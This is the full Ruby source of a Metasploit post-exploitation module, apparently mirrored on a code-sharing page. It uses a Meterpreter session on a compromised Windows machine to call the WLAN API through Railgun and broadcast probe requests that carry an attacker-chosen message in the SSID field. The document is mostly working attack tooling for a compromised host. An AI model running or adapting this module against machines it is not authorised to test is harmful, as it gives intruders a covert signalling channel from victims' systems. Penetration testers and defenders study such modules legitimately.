Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/wlan/wlan_probe_request.rb
19592 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Post
7
8
def initialize(info = {})
9
super(
10
update_info(
11
info,
12
'Name' => 'Windows Send Probe Request Packets',
13
'Description' => %q{
14
This module send probe requests through the wlan interface.
15
The ESSID field will be use to set a custom message.
16
},
17
'License' => MSF_LICENSE,
18
'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>' ],
19
'Platform' => [ 'win' ],
20
'SessionTypes' => [ 'meterpreter' ],
21
'Compat' => {
22
'Meterpreter' => {
23
'Commands' => %w[
24
stdapi_railgun_api
25
stdapi_sys_process_attach
26
stdapi_sys_process_getpid
27
]
28
}
29
},
30
'Notes' => {
31
'Stability' => [CRASH_SAFE],
32
'SideEffects' => [],
33
'Reliability' => []
34
}
35
)
36
)
37
38
register_options(
39
[
40
OptString.new('SSID', [true, 'Message to be embedded in the SSID field', '']),
41
OptInt.new('TIMEOUT', [false, 'Timeout in seconds running probes', '30'])
42
]
43
)
44
end
45
46
def run
47
ssid = datastore['SSID']
48
time = datastore['TIMEOUT']
49
50
if ssid.length > 32
51
fail_with(Failure::BadConfig, 'The SSID must be equal to or less than 32 bytes')
52
end
53
54
mypid = client.sys.process.getpid
55
@host_process = client.sys.process.open(mypid, PROCESS_ALL_ACCESS)
56
@wlanapi = client.railgun.wlanapi
57
58
wlan_handle = open_handle
59
unless wlan_handle
60
print_error("Couldn't open WlanAPI Handle. WLAN API may not be installed on target")
61
print_error('On Windows XP this could also mean the Wireless Zero Configuration Service is turned off')
62
return
63
end
64
65
# typedef struct _DOT11_SSID {
66
# ULONG uSSIDLength;
67
# UCHAR ucSSID[DOT11_SSID_MAX_LENGTH];
68
# } DOT11_SSID, *PDOT11_SSID;
69
dot_11_ssid = [ssid.length].pack('L<') << ssid
70
wlan_iflist = enum_interfaces(wlan_handle)
71
if wlan_iflist.empty?
72
print_status('Wlan interfaces not found')
73
return
74
end
75
76
print_status("Wlan interfaces found: #{wlan_iflist.length}")
77
print_status("Sending probe requests for #{time} seconds")
78
begin
79
::Timeout.timeout(time) do
80
loop do
81
wlan_iflist.each do |interface|
82
vprint_status("Interface Guid: #{interface['guid'].unpack('H*')[0]}")
83
vprint_status("Interface State: #{interface['state']}")
84
vprint_status("DOT11_SSID payload: #{dot_11_ssid.chars.map { |c| c.ord.to_s(16) }.join(':')}")
85
@wlanapi.WlanScan(wlan_handle, interface['guid'], dot_11_ssid, nil, nil)
86
sleep(10)
87
end
88
end
89
end
90
rescue ::Timeout::Error
91
closehandle = @wlanapi.WlanCloseHandle(wlan_handle, nil)
92
if closehandle['return'] == 0
93
print_status('WlanAPI Handle closed successfully')
94
else
95
print_error('There was an error closing the Handle')
96
end
97
end
98
end
99
100
# Function borrowed from @theLightCosine wlan_* modules
101
def open_handle
102
begin
103
wlhandle = @wlanapi.WlanOpenHandle(2, nil, 4, 4)
104
rescue StandardError
105
return nil
106
end
107
return wlhandle['phClientHandle']
108
end
109
110
# Function borrowed from @theLightCosine wlan_* modules
111
def enum_interfaces(wlan_handle)
112
iflist = @wlanapi.WlanEnumInterfaces(wlan_handle, nil, 4)
113
pointer = iflist['ppInterfaceList']
114
115
numifs = @host_process.memory.read(pointer, 4)
116
numifs = numifs.unpack('V')[0]
117
118
interfaces = []
119
120
# Set the pointer ahead to the first element in the array
121
pointer = (pointer + 8)
122
(1..numifs).each do |_i|
123
interface = {}
124
# Read the GUID (16 bytes)
125
interface['guid'] = @host_process.memory.read(pointer, 16)
126
pointer = (pointer + 16)
127
# Read the description(up to 512 bytes)
128
interface['description'] = @host_process.memory.read(pointer, 512)
129
pointer = (pointer + 512)
130
# Read the state of the interface (4 bytes)
131
state = @host_process.memory.read(pointer, 4)
132
pointer = (pointer + 4)
133
# Turn the state into human readable form
134
state = state.unpack('V')[0]
135
case state
136
when 0
137
interface['state'] = 'The interface is not ready to operate.'
138
when 1
139
interface['state'] = 'The interface is connected to a network.'
140
when 2
141
interface['state'] = 'The interface is the first node in an ad hoc network. No peer has connected.'
142
when 3
143
interface['state'] = 'The interface is disconnecting from the current network.'
144
when 4
145
interface['state'] = 'The interface is not connected to any network.'
146
when 5
147
interface['state'] = 'The interface is attempting to associate with a network.'
148
when 6
149
interface['state'] = 'Auto configuration is discovering the settings for the network.'
150
when 7
151
interface['state'] = 'The interface is in the process of authenticating.'
152
else
153
interface['state'] = 'Unknown State'
154
end
155
interfaces << interface
156
end
157
return interfaces
158
end
159
end
160
161